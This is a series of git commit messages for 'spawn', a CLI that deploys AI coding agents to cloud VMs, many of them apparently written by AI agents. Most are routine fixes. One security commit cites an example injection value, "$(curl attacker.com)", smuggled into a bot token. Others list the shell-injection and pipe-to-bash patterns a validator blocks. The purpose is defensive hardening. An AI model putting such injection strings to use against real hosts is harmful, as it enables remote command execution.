The "should match at exactly distance 3" test in findClosestMatch was
using "clau" as input (distance 2 from "claude"), which was identical
to the "should match at distance 2" test immediately below it.
Fixed by using "cla" as input, which is genuinely distance 3 from "claude"
(requires inserting u, d, e), correctly testing the threshold boundary.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
- Remove stale top-level `discovery.sh` reference from CLAUDE.md file
structure (the file was never in the repo; actual script lives at
`.claude/skills/setup-agent-team/discovery.sh`)
- Fix `autonomous-loops.md` rule that referenced `./discovery.sh --loop`
with the correct path to the actual discovery script
No functional code changes. All 1400 tests pass, biome lint clean.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Remove --beta <feature> row from the commands table in README — this flag is
not listed in getHelpUsageSection() in commands/help.ts, which is the source
of truth for the commands table.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
PR #2567 fixed the openclaw modelDefault in code but missed the manifest
interactive_prompts field. Also update discovery.md Hetzner entry from
the old CX22/€3.29 to the current cx23/€3.49.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Adds a "None" option at the top of the setup options multiselect
prompt, pre-selected by default. This fixes two UX issues:
1. Users can now explicitly skip all setup steps by selecting "None"
(or pressing Enter with it pre-selected) — previously impossible
once another option was selected.
2. Arrow keys now respond immediately because multiple items are
available to navigate from the start.
Strips the __none__ sentinel from the returned step set so no
behavioural change occurs when the user selects "None".
Fixes#2569
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Each `openclaw config set` does a read-modify-write on the config file,
which can drop fields written by uploadConfigFile — including
gateway.auth.token. This caused the OpenClaw dashboard to return
"Unauthorized" on every fresh deploy.
Fix: after the browser config set and plugin enable blocks, re-set
gateway.auth.token via `openclaw config set` (same non-fatal pattern as
the existing Telegram token call), ensuring the token survives all
read-modify-write cycles.
Fixes#2570
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
When multiple machines ran `spawn claude aws`, they all registered their
SSH public key under the hardcoded name "spawn-key". The second machine
would find the key already exists and skip import — but the instance got
provisioned with Machine A's key, causing Permission denied on all SSH
retries for Machine B.
Fix: derive the key pair name from the first 8 hex chars of SHA256 of
the public key content (e.g. `spawn-key-a1b2c3d4`). Different machines
get different key names, eliminating the collision entirely.
Fixes#2565
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Telegram and WhatsApp plugins are disabled by default in OpenClaw.
Setting a bot token without enabling the plugin causes the gateway
to hang on startup. Running `openclaw channels login --channel
whatsapp` without the plugin enabled fails with "Unsupported channel".
Now runs `openclaw plugins enable telegram/whatsapp` before any
channel configuration. Also adds step-by-step instructions for
getting a Telegram bot token from @BotFather.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
The model ID `openrouter/openrouter/auto` had a double `openrouter/` prefix
which failed validateModelId() (requires exactly one slash in provider/model
format). This caused the model to be silently ignored on every OpenClaw
launch, falling back to no model default.
Fix: use the correct `openrouter/auto` model ID in both modelDefault field
and the fallback in setupOpenclawConfig().
Fixes#2566
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The --model flag was listed twice in two user-facing outputs:
- help.ts USAGE section: lines 11 and 20 both showed --model <id>
with different descriptions
- index.ts unknown-flag error: lines 118 and 121 both showed --model
with different descriptions
Both duplicates were introduced when --model support was added.
Combined the two entries into one clear line each.
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
jsonEscape() produces double-quoted strings ("value") which allow
shell command substitution $(...) inside bash. A malicious
TELEGRAM_BOT_TOKEN like "$(curl attacker.com)" would execute on
the remote VM when openclaw config is set.
shellQuote() uses POSIX single-quote escaping which prevents all
shell expansion. Every other user-supplied value in agent-setup.ts
(GITHUB_TOKEN, git user.name, git user.email) correctly uses
shellQuote — the bot token was the only exception.
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
HeadlessOptions is defined and used internally in commands/run.ts but
re-exported from commands/index.ts with no consumer — index.ts imports
cmdRunHeadless but passes options inline without importing the type.
This is a CLI binary, not a library, so unused re-exports add surface
area without value.
Also move the run.ts comment to be adjacent to the run.ts exports.
Bump CLI version to 0.17.4.
-- qa/code-quality
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
- Consolidate 4 separate SPAWN_PROMPT/SPAWN_MODE env var tests in
cmdrun-happy-path.test.ts into 2 tests. Each previously spawned a
separate bash subprocess to check a single env var; the consolidated
tests check both vars in one subprocess invocation, halving overhead.
- Remove redundant KNOWN_FLAGS.has() assertions from steps-flag.test.ts.
The findUnknownFlag() call already exercises the Set membership check —
the extra .has() assertion was pure duplication. Also removes the now-
unused KNOWN_FLAGS import.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
New users don't know how to get a bot token. Show instructions
before the prompt: open @BotFather, send /newbot, copy the token.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
ZeroClaw's latest GitHub release (v0.1.9a) ships no binary assets.
The --prefer-prebuilt bootstrap path hits a 404, falls back to Rust
source compilation, and exceeds the 600s install timeout — causing
zeroclaw to fail on all clouds (digitalocean, gcp, hetzner, sprite).
Fix: replace the bootstrap invocation with a direct curl download from
v0.1.7-beta.30 (the last release that ships linux-gnu prebuilt binaries)
into ~/.local/bin. This completes in seconds vs ~20 minutes for a source
build, and removes the swap-space setup step that was only needed for
memory-intensive compilation.
Also remove the now-unused ensureSwapSpace function and update the E2E
verify check to also look in ~/.local/bin for the zeroclaw binary.
-- qa/e2e-tester
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
PickOption, PickConfig, and PickResult interfaces in picker.ts were exported
but never imported by any external module. SpawnConfig type in spawn-config.ts
was similarly exported but not used outside the module. Made all four private
to reduce the public API surface.
Bump CLI patch version to 0.17.2.
-- qa/code-quality
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Dead backwards-compat re-export left over from the shellQuote
consolidation (PRs #2533, #2535, #2546). Zero consumers import
shellQuote from gcp/gcp.ts — all correctly import from shared/ui.ts.
Per CLAUDE.md: avoid backwards-compatibility hacks; delete unused code.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Remove 2 tests from the manifest-integrity.test.ts "structure" describe
block that can never fail:
- "should parse as valid JSON": manifest.json is already parsed via
JSON.parse() at module scope (line 23). If parsing fails, the module
throws and ALL tests fail — this individual test can never provide
an independent failure signal.
- "should have agents, clouds, and matrix top-level keys": after parsing,
Object.keys(manifest.agents/clouds) and Object.entries(manifest.matrix)
are called at module scope (lines 25-27). If those properties were
missing, the module load itself would throw. This test is also guaranteed
to pass whenever any test in the file runs.
Removing these 2 theatrical tests leaves 1403 tests (down from 1405).
All remaining tests provide real signal.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* feat: add Telegram and WhatsApp options to OpenClaw setup picker
Adds separate "Telegram" and "WhatsApp" checkboxes to the OpenClaw
setup screen:
- Telegram: prompts for bot token from @BotFather, injects into
OpenClaw config via `openclaw config set`
- WhatsApp: reminds user to scan QR code via the web dashboard
after launch (no CLI setup possible)
Updates USER.md with channel-specific guidance when either is selected.
Bump CLI version to 0.16.16.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: run WhatsApp QR scan interactively before TUI launch
Instead of punting WhatsApp setup to "after launch", runs
`openclaw channels login --channel whatsapp` as an interactive SSH
session between gateway start and TUI launch. The user scans the
QR code with their phone during provisioning setup.
Flow: gateway starts → tunnel set up → WhatsApp QR scan → TUI launch
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: update WhatsApp hint to reflect pre-TUI QR scanning
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add --config and --steps CLI flags for programmatic setup
Add --config <path> flag to load spawn options from a JSON config file
(model, steps, name, setup data like telegram_bot_token). Add --steps
<list> flag for comma-separated setup step control. Both enable the
web UI and headless automation to control which setup steps run.
Priority order: CLI flags > --config file > env vars > defaults.
- New spawn-config.ts module with valibot validation
- OptionalStep extended with dataEnvVar and interactive metadata
- validateStepNames() for step name validation with warnings
- Telegram setup reads TELEGRAM_BOT_TOKEN env var before prompting
- WhatsApp auto-skipped in headless mode with warning
- promptSetupOptions() skipped when SPAWN_ENABLED_STEPS already set
- E2E verify helpers for github, browser, telegram setup artifacts
- QA reference file documenting all agent setup options
- Version bump to 0.17.0
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add --model flag and priority order tests
- Add --model <id> CLI flag that sets MODEL_ID env var
- --model is extracted before --config so it takes priority
- Add config-priority.test.ts with 8 tests verifying:
- --model overrides config model
- --steps overrides config steps
- --steps "" disables all steps
- --name overrides config name
- Config tokens apply as defaults
- Explicit env vars override config tokens
- Remove preferences.json from priority order docs (not needed)
- Add --model to help text and unknown-flag guidance
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* docs: add --model, --config, --steps to README
Document config file format, setup steps table, and new CLI flags
in the commands table.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review feedback
- Move null byte check before path resolution (defense-in-depth)
- Move agent-setup-options.md from .claude/rules/ to .docs/ (git-ignored)
per documentation policy
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: resolve rebase conflicts and deduplicate --model flag extraction
Rebase on main introduced a duplicate --model flag extraction block
(one from the PR at line 804, one from main at line 941). Consolidated
into the single early extraction point with -m shorthand support.
Also removed duplicate --model entry from KNOWN_FLAGS set.
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Set every agent's featured_cloud to ["digitalocean", "sprite"] — one
primary recommendation (DigitalOcean) and one fallback (Sprite).
Co-authored-by: Claude <claude@anthropic.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
- soak.sh: SOAK_CLOUD env var makes cloud configurable (default: sprite)
- qa.sh: load TELEGRAM_BOT_TOKEN, TELEGRAM_TEST_CHAT_ID, SOAK_CLOUD from
/etc/spawn-qa-auth.env in soak mode
- qa.yml: add weekly Monday 3am UTC scheduled soak trigger
- fix: bun eval → bun -e across soak.sh, key-request.sh, github-auth.sh
(bun eval is not a valid subcommand in bun 1.3.9)
- fix: export _TOKEN via env prefix so process.env._TOKEN works in bun -e
- docs: update shell-scripts.md rule to say bun -e (not bun eval)
Verified: 3/4 Telegram tests pass in smoke test on DigitalOcean (120s wait)
getMe ✓ sendMessage ✓ getWebhookInfo ✓; cron test needs full 55-min window.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
The previous PR (#2536) set the Codex default to gpt-5.1-codex, but the
latest available on OpenRouter is gpt-5.3-codex. Also adds a rules file
documenting each agent's default model to prevent future regressions.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Adds --model / -m CLI flag to override the agent's default LLM model:
spawn codex gcp --model openai/gpt-5.3-codex
Also supports persistent per-agent model preferences via config file at
~/.config/spawn/preferences.json:
{ "models": { "codex": "openai/gpt-5.3-codex" } }
Priority: --model flag > preferences file > agent default.
This enables a future web UI to pass model selection via CLI args when
invoking spawn programmatically to provision machines.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Junie was added as a fully implemented agent (manifest, agent scripts,
agent-setup.ts) but the packer/tarball pipeline was never updated.
This meant the nightly agent-tarballs workflow could not build a
pre-built tarball for Junie, forcing all deployments to do a live
npm install.
- Add junie entry to packer/agents.json (tier: node, @jetbrains/junie-cli)
- Add junie to capture-agent.sh allowlist and path-capture case
(npm-based, same as codex/kilocode — captures /root/.npm-global/)
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Remove redundant existsSync check inside icon-integrity "is actual PNG
data" tests — the file existence is already verified in the preceding
test, and isPng() will throw if the file is missing.
Remove the "should detect multiple dangerous patterns" test from
validatePrompt — it retests the same $(…), backtick, ; rm, and |bash/sh
patterns that each have their own dedicated it() block immediately above.
Fix misleading test description: "should accept scripts with comments
containing dangerous patterns" — the test actually expects a throw
(documented as a known trade-off). Rename to "should reject…".
Removes 1 test (1381 → 1380) and 18 expect() calls.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* security: add DO_CLIENT_SECRET env var override
Allows users/organizations to supply their own DigitalOcean OAuth
client secret via DO_CLIENT_SECRET env var rather than relying on
the bundled default. The bundled secret remains as fallback.
Fixes#2537
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* chore: bump CLI version to 0.16.19
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Three root-cause bugs in input test functions:
1. Stdin pass-through broken: cloud_exec uses "printf '...' | base64 -d | bash"
on the remote, meaning bash reads the script from its own stdin — not the
outer process's stdin. "PROMPT=$(base64 -d)" inside the script was reading
from the already-consumed pipe, always producing an empty prompt.
Fix: embed the base64-encoded prompt directly in the remote command string.
Base64 output is [A-Za-z0-9+/=] only — safe to embed in single-quoted strings.
2. Zeroclaw flag wrong: "zeroclaw agent -p" was passing the prompt as
--provider (not --prompt). The correct flag for non-interactive single-message
mode is "-m"/"--message".
3. Codex model stale: "openai/gpt-5-codex" does not exist on OpenRouter.
Updated to "openai/gpt-5.1-codex" which is available.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
PR #2533 hardened GCP with shellQuote() and null-byte rejection, but
left Hetzner, DigitalOcean, AWS, and connect.ts using inline
.replace(/'/g, "'\\''") without null-byte validation.
- Move shellQuote to shared/ui.ts as the single source of truth
- Add null-byte validation to runServer in Hetzner, DO, and AWS
- Replace inline shell escaping with shellQuote in interactiveSession
across all clouds, connect.ts, and agents.ts buildEnvBlock
- Re-export shellQuote from gcp.ts for backwards compatibility
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Consolidate 9 per-credential-type it() blocks in prompt-file-security.test.ts
into a single data-driven test covering all 17 sensitive path patterns.
Merge 2 validatePromptFileStats "accept" tests into one.
Consolidate 4 unicode/encoding-attack it() blocks in security.test.ts
into a single data-driven test. Merge 3 "accept identifier" it() blocks into one.
Removes 19 redundant tests (1400 → 1381) with no loss of coverage.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
- Add null-byte rejection to shellQuote (defense-in-depth)
- Export shellQuote for testability
- Refactor interactiveSession to use shellQuote instead of inline escaping
- Add comprehensive test suite for shellQuote security properties
Fixes#2529
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Consolidate 8 fragmented pipe-to-bash/sh tests in validatePrompt into 2
data-driven tests covering all inputs (with/without whitespace, complex
pipelines, and standalone word acceptance). Merge 3 backtick tests into 1.
Merge 2 whitespace tests into 1. Removes 19 lines of duplicate test setup.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
The identical generateCsrfState() helper existed in both
digitalocean/digitalocean.ts and shared/oauth.ts. Export it from
oauth.ts (which digitalocean.ts already imports) and remove the
duplicate copy.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Add base64 character validation ([A-Za-z0-9+/=]) before use in SSH
command strings for gcp.sh, aws.sh, and hetzner.sh cloud_exec
functions -- matching the existing fix in digitalocean.sh (#2528).
Also add a validated _encode_b64 helper to soak.sh and use it for
all Telegram bot token encoding, preventing corrupted base64 from
breaking out of single-quoted SSH command strings.
Closes#2527
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Add explicit base64 character validation in _digitalocean_exec after
encoding the command, matching the existing pattern in provision.sh.
This ensures the encoded value contains only [A-Za-z0-9+/=] before
embedding it in the SSH command string.
Note: #2527 (provision.sh base64 validation) was already fixed in a
prior commit — the validation at lines 284-289 already rejects
non-base64 characters and empty output.
Fixes#2526
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Replace `if (!r.ok) { expect(...) }` and `if (result.ok) { return }` guards
with unconditional assertions using toThrow() or toMatchObject(). These
conditional blocks silently skipped assertions when the condition evaluated
the wrong way, providing false confidence. Also remove now-unused tryCatch
imports from prompt-file-security.test.ts and security.test.ts.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* test: add cron-triggered Telegram reminder to soak test
Tests OpenClaw's ability to stay alive and execute scheduled tasks.
Installs a one-shot cron on the VM before the 1h soak wait that sends
a Telegram message at ~55 min, then verifies the message was sent
after the wait completes. Also moves Telegram config injection before
the soak wait so the cron can use the bot token immediately.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* test: use OpenClaw's cron scheduler instead of system crontab
Replaces the raw system cron approach with OpenClaw's built-in cron
scheduler (`openclaw cron add`). This properly tests that OpenClaw's
gateway stays alive after 1 hour and can execute scheduled tasks.
The test now:
1. Injects Telegram config + schedules an OpenClaw cron job (--at +55min)
2. Waits 1 hour (soak)
3. Verifies the job fired via `openclaw cron runs` and `openclaw cron list`
Uses --delete-after-run for one-shot semantics. Verification checks both
the run history and the auto-deletion as proof of execution.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* test: verify cron message on Telegram side via forwardMessage
Instead of trusting OpenClaw's self-reported cron status, we now verify
the message actually exists in the Telegram chat:
1. Extract message_id from OpenClaw's cron execution logs (tries
`openclaw cron runs`, then ~/.openclaw/cron/ directory)
2. Call Telegram's forwardMessage API with that message_id
3. If Telegram can forward it → message EXISTS in the chat (proof
from Telegram itself, not OpenClaw)
This catches cases where OpenClaw reports success but the message
never actually reached Telegram.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review findings in soak test
- Add validate_positive_int() and validate SOAK_WAIT_SECONDS +
SOAK_CRON_DELAY_SECONDS at startup (prevents command injection via
crafted env vars)
- Validate TELEGRAM_TEST_CHAT_ID is numeric in soak_validate_telegram_env
- Use per-app marker file /tmp/.spawn-cron-scheduled-${app} to avoid
race conditions when multiple soak tests run on the same VM
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
When provisioning hits a 422 "droplet limit exceeded" response, wait 30s
and retry up to 3 times. Makes E2E suite resilient to transient limit hits
during parallel batch provisioning.
Fixes#2516
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Previously, _digitalocean_max_parallel() always returned 3, assuming all
quota slots were available. When pre-existing droplets occupy slots, the
batch-3 parallel runs fail with "droplet limit exceeded" API errors.
Now queries /v2/account for the actual droplet_limit and subtracts the
current droplet count to compute available capacity. Falls back to 3 if
the API is unreachable.
-- qa/e2e-tester
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
OpenClaw requires the openrouter/ provider prefix for model IDs.
The previous default (moonshotai/kimi-k2.5) was missing the prefix,
causing "Unknown model" warnings. Reverted to openrouter/openrouter/auto
which uses OpenRouter's auto-router to pick the best model per prompt.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Replace `if (result.ok) { expect(result.data)... }` guards with
`expect(result).toMatchObject({ ok: true, data: ... })`. The old pattern
silently skips inner expects when the condition is false — `toMatchObject`
asserts both discriminant and value in a single unconditional call.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
DO_DROPLET_SIZE default documented as s-2vcpu-4gb ($24/mo) but code and manifest
both use s-2vcpu-2gb ($18/mo). Also fixes stale getUserHome() source reference in
testing rules (shared/paths.ts, not shared/ui.ts).
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
#2507 pre-selected all setup options. Only browser should default to
enabled — GitHub CLI and reuse-saved-key are opt-in.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
The two getTerminalWidth tests only checked that the function returns
a number >= 80. Since the implementation is `process.stdout.columns || 80`,
both assertions are trivially satisfied in any environment and provide
zero regression signal. Removed them along with the unused import.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
When Sprite (or another cloud) times out during provisioning, provision.sh
falls back to constructing .spawnrc manually over SSH. The claude and codex
agents were missing from the agent-specific case block, so:
- claude: ANTHROPIC_BASE_URL and ANTHROPIC_AUTH_TOKEN were never written,
causing verify_claude's openrouter.ai check to fail
- codex: OPENAI_API_KEY and OPENAI_BASE_URL were never written
Discovered during E2E run: sprite/claude failed with .spawnrc timeout +
missing openrouter.ai in fallback .spawnrc.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
PR #2505 migrated all bun -e → bun eval across shell scripts but
missed 2 instances in sh/shared/key-request.sh (lines 32 and 61).
This completes the migration for consistency.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The multiselect picker for setup options (Chrome browser, GitHub CLI,
etc.) started with nothing selected. Now all available options are
pre-selected so users get the full setup by default.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: bump quality cycle timeout to 90 min and recognize gcp cli auth
- Quality cycle was hitting the 45 min hard limit mid-run; bumped
CYCLE_TIMEOUT from 2400s (40 min) to 5400s (90 min) so E2E tests
(provision + install + verify across multiple clouds) have room to
complete without getting killed
- Updated qa-quality-prompt time budget from 35 min to 85 min to match
- Added _check_cli_auth_clouds() to key-request.sh: for clouds that use
CLI auth (gcp via gcloud), check if the CLI has an active account
instead of reporting them as missing and sending key-request emails
- GCP_PROJECT is loaded from ~/.config/spawn/gcp.json when gcloud is
authenticated; other CLI-auth clouds (sprite) are excluded from the
count since they are not auto-checkable
* fix: replace local -n namerefs with eval for bash 3.2 compatibility
local -n (namerefs) requires bash 4.3+ and breaks on macOS which ships
bash 3.2. Replace with eval-based variable indirection that works on
all supported bash versions.
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: validate GCP_PROJECT format before export to prevent shell injection
Security: project ID from config now validated against ^[a-z][a-z0-9-]*$
pattern before export. Invalid IDs are rejected with a log message.
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>